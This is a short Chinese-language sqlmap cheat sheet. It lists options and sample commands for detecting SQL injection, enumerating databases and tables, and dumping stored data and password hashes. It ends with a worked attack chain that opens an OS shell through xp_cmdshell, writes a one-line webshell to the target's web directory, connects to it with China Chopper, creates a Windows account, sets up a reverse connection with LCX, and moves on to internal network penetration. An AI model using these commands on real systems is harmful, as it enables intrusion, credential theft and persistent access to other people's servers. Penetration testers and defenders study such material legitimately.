SQLMap

一、简介

SQL注入漏洞检测与利用工具

-u URL:检测URL是否存在基本的GET注入；

--cookie:在发送请求时一并发送Cookie的值。当要检测网站需要Cookie信息才能访问或需要进行SQL注入检测时，都需要使用该参数提交相应的cookie数据；

--level (1-5):检测强度，值越高检测的项目越多，如--level 3会检测Cookie是否存在注入；

--risk:检测风险程度，值越高风险越大，成功概率在某些情况下更高。

-p:注入指定参数。

-r:Post注入时指定存储POST请求的文件；

--dbs:列出网站的数据库；

--tables:列出网站数据库中的表；

--columns:列出网站数据库中的列

--dump:输出数据；

-D(-T -C):指定数据库（表或列）；

--current-db:列出当前数据库;

--current-user:列出数据库用户;

--passwords:列出数据库密码Hash;

sqlmap -h#查看sqlmap的帮助信息

sqlmap -u url?id=5#检测是否存在注入；

sqlmap -u url?id=5 --dbs#列出数据库

sqlmap -u url?id=5 -D mysql --tables#列出表名

sqlmap -u url?id=5 -D mysql -T user -C password -dump#得到密码md5算法加密的值 

案例1：

1、sqlmap -u url --privileges#查看权限指令

只有最高权限才能执行系统命令比如sa

2、--os-shell#查看目标主机xp_cmdshell是否开启，os_shell>表示是开启的，可以写系统命令比如ipconfig

3、全盘遍历：

dir /s /b C:\ D:\|find "info.jsp"

4、sqlmap -u url --file-write=c:\\Users\\Administrattor\\exp.jsp  --file-dest=D:\\.....info.jsp#一句话木马写入

浏览器访问一句话木马，看是否写入成功，404是不成功，反之成功。打开菜刀连接。创建windows账户，通过LCX等工具进行反向连接，通过该账户进行远程桌面连接，最后进行下一步的内网渗透。